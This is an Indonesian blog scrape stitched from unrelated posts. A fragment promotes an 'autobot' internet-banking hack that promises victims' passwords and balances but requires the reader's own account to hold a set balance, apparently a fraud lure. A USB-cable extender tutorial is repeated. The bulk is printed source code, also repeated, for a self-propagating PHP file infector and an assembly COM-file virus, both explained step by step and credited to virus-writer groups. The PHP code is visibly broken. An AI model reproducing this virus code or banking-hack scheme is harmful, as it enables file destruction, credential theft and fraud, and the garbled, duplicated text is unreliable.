( tidak boleh dirubah untuk proses autobot hacking internet banking )
Baris 6
>script< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 7 >input_type_account_value=send_pass=istrue< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 8 >searching_page=hack3.php< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 9 >server_ip=0000.1010.9999< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 10 >end_script< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) ***************************************************************************
PENTING
Agar autobotinternet banking bisa bekerja dengan baik dan berjalan dengan lancar untuk mendapatkan seluruh informasi mengenai account rekeningtarget ( seperti jumlah saldo target , alamat email target password email target, nama pemilik rekening target, nomor rekening target, user name internet banking target, password internet banking target, nomor telepon target, alamat rumah target, dll ), maka didalam rekening bank anda harus mempunyai saldo minimal Rp.251.111,- atau lebih. Jika rekening bank anda saldonya dibawah Rp.251.111,- maka trik ini tidak akan berfungsi meskipun kurang Rp. 1,- saja, karena nomor rekening anda dianggap tidak aktif oleh program autobot internet banking.
Diposkan oleh wong di 17:46
Halaman Muka
Langgan: Daniel dedi w[SSA]
Arsip Blog
• ▼ 2009 (1)
o ▼ APRIL(1)
jebol rek bank
USB Extender Memperpanjang Kabel USB dengan Kabel UTP
USB Extender
Memperpanjang Kabel USB dengan Kabel UTP
Pada kesempatan kali ini saya akan berusaha menulis dan mejelaskan cara membuat USB Extender dengan perpanjangan menggunakan Kabel UTP, agar dapat lebih memperjelas tulisan ini, saya juga menyertakan gambar/ foto dari album foto Pa Egoen. Sebelum nya saya ucapkan terima kasih buat Pak Goen, yang selalu memberikan inspirasi2 baru.
Ok, Mengapa kita perlu kabel USB yang panjang? Karena kabel Usb yang tersedia di Pasaran biasanya maksimal cuma 1-1,5 mtr. Walau sebenarnya ada yang 10-20 mtr, tapi jarang ada dan biasanya memerlukan USB repeater (klo ga salah itu namanya) untuk memperkuat aliran data di USB yang cukup panjang. yang menjadi masalah adalah harga USB repeater tersebut cukup mahal untuk saya beli, untunglah Pak Goen memberikan solusi dengan memperpanjang kabel USB menggunakan kabel UTP. Karena klo kabel USB nya diperpanjang dengan UTP kemungkinan besar untuk 20 mtr masih bisa tanpa USB Repeater(walaupun masih tergantung sama USB nya yang di Motherboard juga). Biasanya keperluan kabel USB panjang ini digunakan untuk pemasangan antena USB WiFi OutDoor, perpanjangan kabel printer,USB HUB, dll...
Disaranakan menggunakan USB ver 1.0, karena berdasarkan pengalaman. Trik ini hampir selalu berhasil pada USB ver 1.0
Baiklah, kita langsung pada prakteknya saja. Bahan dan peralatan yang perlu disiapkan adalah:
1. Kabel UTP, panjang nya sesuai dengan keperluan. Tetapi saya sarankan tidak lebih dari 20 meter. Kalau lebih dari 20 meter, akan diperlukan usb repeater/ usb extender untuk memperkuat aliran data dan daya.
2. Kabel USB
3. Rubber tape
4. Thermofit/ kondom kabel (optional)
5. Pipa pvc kecil
6. Gunting
7. Solder
Setelah semua bahan disiapkan, yang pertama harus dilakukan adalah Kupas kabel UTP pada kedua ujung nya. Dan di bagi menjadi 4 bagian seperti pada gambar di bawah ini. Pembagian nya, kabel orange di gabung dengan kabel putih-orange, putih-biru, hijau dan sisanya dari 4 kabel digabung menjadi satu.
Selanjutnya, kabel usb yang sudah disiapkan tadi dipotong manjadi 2 bagian.
Kemudian ujung2nya di kupas, seperti pada gambar dibawah:
Tahap selanjutnya, masukkan pipa pvc kecil/ pipauntuk pelindung sambungan ke masing masing ujung bakel UTP
Dan, begitu juga pada bagian kabel usb nya. Masukkan kondom pembungkus kabel pada masing masing bagian kabel USB.
Selanjutnya, sambungkan kabel UTP dengan kabel USB, dengan urutan seperti gambar di bawah ini, sangat disarankan menggunakan solder, karena dari pengalaman saya ketika tidak menggunakan solder, USB device tidak terdetek oleh computer walaupun sudah diset menjadi USB versi 1.0:
Setelah semua kabel tersambung, bungkus sambungan tersebut menggunakan kondom kabel/ thermofit.
Dan setelah itu, bungkus kembali sambungan tadi dengan pipa pvc kecil.
Sekarang, kabel USB sudah siap digunakan untuk keperluan antenna Wajanbolic menggunakan USB WiFi/ USB WLAN
Semoga bisa bermanfaat.
Yusda R. Noor
YM: yusda_46
yusdas@gmail.com
http://dieysuck.wordpress.com
http://rizaldi.net
Memperpanjang Kabel USB dengan Kabel UTP
Pada kesempatan kali ini saya akan berusaha menulis dan mejelaskan cara membuat USB Extender dengan perpanjangan menggunakan Kabel UTP, agar dapat lebih memperjelas tulisan ini, saya juga menyertakan gambar/ foto dari album foto Pa Egoen. Sebelum nya saya ucapkan terima kasih buat Pak Goen, yang selalu memberikan inspirasi2 baru.
Ok, Mengapa kita perlu kabel USB yang panjang? Karena kabel Usb yang tersedia di Pasaran biasanya maksimal cuma 1-1,5 mtr. Walau sebenarnya ada yang 10-20 mtr, tapi jarang ada dan biasanya memerlukan USB repeater (klo ga salah itu namanya) untuk memperkuat aliran data di USB yang cukup panjang. yang menjadi masalah adalah harga USB repeater tersebut cukup mahal untuk saya beli, untunglah Pak Goen memberikan solusi dengan memperpanjang kabel USB menggunakan kabel UTP. Karena klo kabel USB nya diperpanjang dengan UTP kemungkinan besar untuk 20 mtr masih bisa tanpa USB Repeater(walaupun masih tergantung sama USB nya yang di Motherboard juga). Biasanya keperluan kabel USB panjang ini digunakan untuk pemasangan antena USB WiFi OutDoor, perpanjangan kabel printer,USB HUB, dll...
Disaranakan menggunakan USB ver 1.0, karena berdasarkan pengalaman. Trik ini hampir selalu berhasil pada USB ver 1.0
Baiklah, kita langsung pada prakteknya saja. Bahan dan peralatan yang perlu disiapkan adalah:
1. Kabel UTP, panjang nya sesuai dengan keperluan. Tetapi saya sarankan tidak lebih dari 20 meter. Kalau lebih dari 20 meter, akan diperlukan usb repeater/ usb extender untuk memperkuat aliran data dan daya.
2. Kabel USB
3. Rubber tape
4. Thermofit/ kondom kabel (optional)
5. Pipa pvc kecil
6. Gunting
7. Solder
Setelah semua bahan disiapkan, yang pertama harus dilakukan adalah Kupas kabel UTP pada kedua ujung nya. Dan di bagi menjadi 4 bagian seperti pada gambar di bawah ini. Pembagian nya, kabel orange di gabung dengan kabel putih-orange, putih-biru, hijau dan sisanya dari 4 kabel digabung menjadi satu.
Selanjutnya, kabel usb yang sudah disiapkan tadi dipotong manjadi 2 bagian.
Kemudian ujung2nya di kupas, seperti pada gambar dibawah:
Tahap selanjutnya, masukkan pipa pvc kecil/ pipauntuk pelindung sambungan ke masing masing ujung bakel UTP
Dan, begitu juga pada bagian kabel usb nya. Masukkan kondom pembungkus kabel pada masing masing bagian kabel USB.
Selanjutnya, sambungkan kabel UTP dengan kabel USB, dengan urutan seperti gambar di bawah ini, sangat disarankan menggunakan solder, karena dari pengalaman saya ketika tidak menggunakan solder, USB device tidak terdetek oleh computer walaupun sudah diset menjadi USB versi 1.0:
Setelah semua kabel tersambung, bungkus sambungan tersebut menggunakan kondom kabel/ thermofit.
Dan setelah itu, bungkus kembali sambungan tadi dengan pipa pvc kecil.
Sekarang, kabel USB sudah siap digunakan untuk keperluan antenna Wajanbolic menggunakan USB WiFi/ USB WLAN
Semoga bisa bermanfaat.
Yusda R. Noor
YM: yusda_46
yusdas@gmail.com
http://dieysuck.wordpress.com
http://rizaldi.net
PEMBUATAN VIRUS HP
Cara Sederhana membuat virus PHP
Membuat virus bisa dengan bahasa apa saja dan salah
satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
nama I-Worm.PHP.Indonesia dibuat.
OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb
:
1. Artikel ini ditujukan buat menambah pengetahuan IT kita
saja
2. Saya dan penulis asli artikel ini (sevenC) tidak
bertanggungjawab
Jika ada lamer yang bertindak bodoh dengan menyebarkan
skrip ini
3. Judul asli artikel ini adalah "Simple technique how to
write PHP virus"
4. Artikel ini sebenarnya buatan sevenC (
http://sevenc.vze.com )
dan saya hanya menterjemahkannya kedalam bahasa
indonesia,saya
nanti akan mencantumkan kredit kepada sobat saya
sevenC,karna
saya udah buat artikel ini memakai versi indonesia.
5. Skrip yang saya pake disini juga merupakan skrip virus
"PHP.Indonesia"
buatan sevenC dan udah terdeteksi Kaspersky nama
"I-Worm.PHP.Indonesia"
Ok...Kita mulai aja..!!
Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
coba ngejelasin
baris demi baris arti codenya.
-------------------------------Code-------------------------------
// #################################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ##################################################
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "");
$fputs($new, " $fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
--------------------------------------eoc-----------------------
Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
yah...!! :) maklum
gw belum setaraf sama sevenC,hehehe... :P
-------------------------------------begin----------------------
* Loe pasti tau kalo PHP musti dimulai make tanda ini --> buat ngunjukin
browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai
dengan karakter -->> //
Jadi baris2 di atas engga akan di eksekusi karna cuman
komentar.
$jawa = "indonesia.php\n";
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string "indonesia.php" dan
\n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter
titik koma ? ;
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
* Menset variabel sumatra sama dengan string "Wellcome to
Indonesian PHPlovers"
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir('C:\Windows\');
* var $all = membuka direktory windows
$all1 = opendir('C:\My Documents\');
* var $all1 = membuka direktory My Documents
$all2 = opendir('C:\InetPub\wwwRoot\');
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah
karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
$inf = true;
* menSet var $inf sebagai variabel boolean = true
$exe = false;
* menSet var $exe sebagai variabel boolean = false
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
* Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
if ( is_file($file) && is_writeable($file) )
* Mencek atribut2 file,jika kita diijinkan menulis lalu
{
* Skali lagi jangan lupa tanda ini
$new = fopen($file, "r");
* menSet $new = membuka file baru dengan atribut read only
yang hanya bisa dibaca saja
$look = fread($new, filesize($file));
* menSet $look = membaca var $new dan ukuran dari file
$yes = strstr ($look, 'indonesia.php');
* menSet $yes = $look , indonesia.php
if (!$yes) $inf = false;
* Jika bukan var $yes maka var $inf bernilai salah
}
if ( ($inf=false) )
* jika var $inf = salah kemudian
{
$new = fopen($file, "a");
* menSet $new = membuka file ( variabel $file ) / file yang
diinfeksi
$fputs($new, "");
* tulis string "--->" kedalam file tsb ($new)
$fputs($new, " * Tulis seluruh kode virus ini kedalam file tsb
$fputs($new, "include(\"");
* tulis string "include(\" kedalam file tsb ($new)
$fputs($new, __FILE__);
* Tulis juga seluruh kode / skrip asli dari file tsb
$fputs($new, "\"); ");
* Tulis "\" kedalam file tsb
$fputs($new, "?>");
* Tulis "?>" kedalam file tsb
return;
* Ulangi langkah-langkah diatas
}
}
closedir($all3);
* menutup semua direktori yang aktif tadi ($all3)
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
* komentar om sevenC
?>
* Nutup skrip virus PHP ini
--------------------------------Selesai---------------------------
Ok... mudah-mudahan loe semua ngerti apa yang gw tulis
diatas,kalo kagak ? bodo amat :P
Kredit buat :
1. sevenC (http://trax.to/sevenC)
Biarpun umurnya masih belasan tapi gw salut banget sama
otaknya karna
Gw udah banyak belajar dari artikelnya.greatz & Thankz
man..!!
kapan neh bisa ktemuan ??
2. SECTORS (http://sectors.vze.com)
Makasih buat semua anak2 sectors baik yang masih aktif
maupun tidak di forum
teruskan perjuangan kalian, jangan mau bangsa kita ditindas
kebodohan.
Bantai semua lamer yang ada di Forum.
3. IVWA / Indonesian Virus Writer Association
(http://www.geocities.com/ivwa_staff)
Kapan neh peluncuran zine pertama ? gw udah gak sabar
neh...!!
4. semua anak2 yang pernah gw temuin di #sectors (woi channel
jangan ditinggal molo..!!)
saran dan kritik kirim ke stupy_man@yahoo.com
stupy (ex member of sectors)
stupy_man @ yahoo.com
Pemrograman Virus Komputer II
Thursday, February 13, 2003- Jumlah Klik [3091] , Penulis :
Dr`Ponidi
Jasakom - Bila dibandingkan dengan virus bacthfile, yang
pernah kita bicarakan maka virus yang kita bahas sekarang ini
telah memiliki kelima kemampuan seperti apa yang telah saya
sampaikan terdahulu.
1. Pendahuluan
Virus komputer yang akan dibicarakan dibawah ini ditulis dalam
bahasa assembley.Bila dibandingkan dengan virus bacthfile,
yang pernah kita bicarakan maka virus yang kita bahas sekarang
ini telah memiliki kelima kemampuan seperti apa yang telah
saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket,
serta memeriksanya apakah telah tertular atau belum.Bila
belum, maka virus akan menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :”File ini
telah tertular Virus komputer!” atau “Semua file COM pada
disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan
membutuhkan beberapa file untuk menjalankannya, maka virus
yang akan kita bahas ini nantinya dapat bekerja sendiri dan
tidak menghasilkan file baru, sehingga kemampuan
menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah
termasuk jenis virus yang menumpangi program yang
ditularinya.Dengan demikian virus ini bersifat merusak.
2. Algoritma
Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte
bagian awal dari program, periksa apakah file tersebut telah
tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan
menyalin seluruh program virus ke file tersebut
(menumpangi).Kemudian tampilkan pesan :”File ini telah
tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah
2.
5.Jika semua file COM telah tertular, maka tampilkan pesan :
“semua file Com pada disket ini telah tertular virus
komputer!!!”
3. Program dan Mekanisme Penularan
Program dibawah ini merupakan implementasi dari bagian diatas.
Catatan : Program virus ini menggunakan instruksi
macro.Definisi macro yang digunakan terdapat pada file
LAMMER.MAC.(klo pengen liat file macronya kirim email ke
Dr`Ponidi@crackdealer.com)
;------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------
IF1
INCLUDE LAMMER.MAC
ENDIF
Code_segSEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai :jmp kerjakan
IdentitasDB `File ini telah tertular virus komputer !$`
PeringatanDB `semua file COM dalam disket ini telah
tertular virus`
DB `Komputer !!!$`
File_COMDB`*.com`,0h
Nama_fileDB 13 DUP(?)
Panjang_idequ 45
Panjang_virequ 445
Atributequ 20h
Open_codeequ 2
Jumlahequ 0ffffh
DTADB43 DUP(20h)
Kerjakan :Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah:cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar :Ke_dos
Laksanakan :mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos
Cari_lainnya :pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
BufferLabel byte
Code_segENDS
END mulai
4. Penjelasan
Awal dari penularan dimulai ketika program virus ini
dijalankan pada disket yang berisi file-file COM.Virus
mula-mula akan menulari file COM yang pertama (berdasarkan
urutan file-file pada disket).Dengan penularan ini, maka file
tersebut menjadi sumber penularan baru, dan virus yang asli
dapat dihapus.File-file yang telah tertular ukurannya tidak
berubah.
Bila file yang telah tertular itu dijalankan, maka file itu
tidak dapat menjalankan fungsinya dan hanya akan menampilkan
pesan :”File ini telah tertular Virus komputer!”.Sebelumnya,
file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam
directory utama adalah COMMAND.COM, maka setiap kali melakukan
boot dengan disket itu, tak akan pernah berhasil dan
sebelumnya virus akan menulari sebuah program COM lain yang
belum tertular.
Harap diperhatikan bahwa virus ini tidak dapat bekerja dengan
baik bila berada pada file COM yang ukurannya lebih kecil
daripada ukuran program virus yang asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara
lengkap atau buffer telah melampaui batas daerah CS (Code
Segment)
Demikianlah Artikel yang dapat saya sampaikan pada kesempatan
ini, Semoga informasi yang saya sampaikan dapat bermanfaat
bagi pengetahuan bagi kita semua ,khususnya bagi yang concern
terhadap virus.Sekian terima kasih cao……:) :) :)
Author : DANIEL[SSA]
Membuat virus bisa dengan bahasa apa saja dan salah
satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
nama I-Worm.PHP.Indonesia dibuat.
OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb
:
1. Artikel ini ditujukan buat menambah pengetahuan IT kita
saja
2. Saya dan penulis asli artikel ini (sevenC) tidak
bertanggungjawab
Jika ada lamer yang bertindak bodoh dengan menyebarkan
skrip ini
3. Judul asli artikel ini adalah "Simple technique how to
write PHP virus"
4. Artikel ini sebenarnya buatan sevenC (
http://sevenc.vze.com )
dan saya hanya menterjemahkannya kedalam bahasa
indonesia,saya
nanti akan mencantumkan kredit kepada sobat saya
sevenC,karna
saya udah buat artikel ini memakai versi indonesia.
5. Skrip yang saya pake disini juga merupakan skrip virus
"PHP.Indonesia"
buatan sevenC dan udah terdeteksi Kaspersky nama
"I-Worm.PHP.Indonesia"
Ok...Kita mulai aja..!!
Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
coba ngejelasin
baris demi baris arti codenya.
-------------------------------Code-------------------------------
// #################################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ##################################################
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "");
$fputs($new, " $fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
--------------------------------------eoc-----------------------
Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
yah...!! :) maklum
gw belum setaraf sama sevenC,hehehe... :P
-------------------------------------begin----------------------
* Loe pasti tau kalo PHP musti dimulai make tanda ini --> buat ngunjukin
browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai
dengan karakter -->> //
Jadi baris2 di atas engga akan di eksekusi karna cuman
komentar.
$jawa = "indonesia.php\n";
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string "indonesia.php" dan
\n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter
titik koma ? ;
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
* Menset variabel sumatra sama dengan string "Wellcome to
Indonesian PHPlovers"
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir('C:\Windows\');
* var $all = membuka direktory windows
$all1 = opendir('C:\My Documents\');
* var $all1 = membuka direktory My Documents
$all2 = opendir('C:\InetPub\wwwRoot\');
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah
karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
$inf = true;
* menSet var $inf sebagai variabel boolean = true
$exe = false;
* menSet var $exe sebagai variabel boolean = false
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
* Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
if ( is_file($file) && is_writeable($file) )
* Mencek atribut2 file,jika kita diijinkan menulis lalu
{
* Skali lagi jangan lupa tanda ini
$new = fopen($file, "r");
* menSet $new = membuka file baru dengan atribut read only
yang hanya bisa dibaca saja
$look = fread($new, filesize($file));
* menSet $look = membaca var $new dan ukuran dari file
$yes = strstr ($look, 'indonesia.php');
* menSet $yes = $look , indonesia.php
if (!$yes) $inf = false;
* Jika bukan var $yes maka var $inf bernilai salah
}
if ( ($inf=false) )
* jika var $inf = salah kemudian
{
$new = fopen($file, "a");
* menSet $new = membuka file ( variabel $file ) / file yang
diinfeksi
$fputs($new, "");
* tulis string "--->" kedalam file tsb ($new)
$fputs($new, " * Tulis seluruh kode virus ini kedalam file tsb
$fputs($new, "include(\"");
* tulis string "include(\" kedalam file tsb ($new)
$fputs($new, __FILE__);
* Tulis juga seluruh kode / skrip asli dari file tsb
$fputs($new, "\"); ");
* Tulis "\" kedalam file tsb
$fputs($new, "?>");
* Tulis "?>" kedalam file tsb
return;
* Ulangi langkah-langkah diatas
}
}
closedir($all3);
* menutup semua direktori yang aktif tadi ($all3)
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
* komentar om sevenC
?>
* Nutup skrip virus PHP ini
--------------------------------Selesai---------------------------
Ok... mudah-mudahan loe semua ngerti apa yang gw tulis
diatas,kalo kagak ? bodo amat :P
Kredit buat :
1. sevenC (http://trax.to/sevenC)
Biarpun umurnya masih belasan tapi gw salut banget sama
otaknya karna
Gw udah banyak belajar dari artikelnya.greatz & Thankz
man..!!
kapan neh bisa ktemuan ??
2. SECTORS (http://sectors.vze.com)
Makasih buat semua anak2 sectors baik yang masih aktif
maupun tidak di forum
teruskan perjuangan kalian, jangan mau bangsa kita ditindas
kebodohan.
Bantai semua lamer yang ada di Forum.
3. IVWA / Indonesian Virus Writer Association
(http://www.geocities.com/ivwa_staff)
Kapan neh peluncuran zine pertama ? gw udah gak sabar
neh...!!
4. semua anak2 yang pernah gw temuin di #sectors (woi channel
jangan ditinggal molo..!!)
saran dan kritik kirim ke stupy_man@yahoo.com
stupy (ex member of sectors)
stupy_man @ yahoo.com
Pemrograman Virus Komputer II
Thursday, February 13, 2003- Jumlah Klik [3091] , Penulis :
Dr`Ponidi
Jasakom - Bila dibandingkan dengan virus bacthfile, yang
pernah kita bicarakan maka virus yang kita bahas sekarang ini
telah memiliki kelima kemampuan seperti apa yang telah saya
sampaikan terdahulu.
1. Pendahuluan
Virus komputer yang akan dibicarakan dibawah ini ditulis dalam
bahasa assembley.Bila dibandingkan dengan virus bacthfile,
yang pernah kita bicarakan maka virus yang kita bahas sekarang
ini telah memiliki kelima kemampuan seperti apa yang telah
saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket,
serta memeriksanya apakah telah tertular atau belum.Bila
belum, maka virus akan menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :”File ini
telah tertular Virus komputer!” atau “Semua file COM pada
disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan
membutuhkan beberapa file untuk menjalankannya, maka virus
yang akan kita bahas ini nantinya dapat bekerja sendiri dan
tidak menghasilkan file baru, sehingga kemampuan
menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah
termasuk jenis virus yang menumpangi program yang
ditularinya.Dengan demikian virus ini bersifat merusak.
2. Algoritma
Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte
bagian awal dari program, periksa apakah file tersebut telah
tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan
menyalin seluruh program virus ke file tersebut
(menumpangi).Kemudian tampilkan pesan :”File ini telah
tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah
2.
5.Jika semua file COM telah tertular, maka tampilkan pesan :
“semua file Com pada disket ini telah tertular virus
komputer!!!”
3. Program dan Mekanisme Penularan
Program dibawah ini merupakan implementasi dari bagian diatas.
Catatan : Program virus ini menggunakan instruksi
macro.Definisi macro yang digunakan terdapat pada file
LAMMER.MAC.(klo pengen liat file macronya kirim email ke
Dr`Ponidi@crackdealer.com)
;------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------
IF1
INCLUDE LAMMER.MAC
ENDIF
Code_segSEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai :jmp kerjakan
IdentitasDB `File ini telah tertular virus komputer !$`
PeringatanDB `semua file COM dalam disket ini telah
tertular virus`
DB `Komputer !!!$`
File_COMDB`*.com`,0h
Nama_fileDB 13 DUP(?)
Panjang_idequ 45
Panjang_virequ 445
Atributequ 20h
Open_codeequ 2
Jumlahequ 0ffffh
DTADB43 DUP(20h)
Kerjakan :Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah:cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar :Ke_dos
Laksanakan :mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos
Cari_lainnya :pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
BufferLabel byte
Code_segENDS
END mulai
4. Penjelasan
Awal dari penularan dimulai ketika program virus ini
dijalankan pada disket yang berisi file-file COM.Virus
mula-mula akan menulari file COM yang pertama (berdasarkan
urutan file-file pada disket).Dengan penularan ini, maka file
tersebut menjadi sumber penularan baru, dan virus yang asli
dapat dihapus.File-file yang telah tertular ukurannya tidak
berubah.
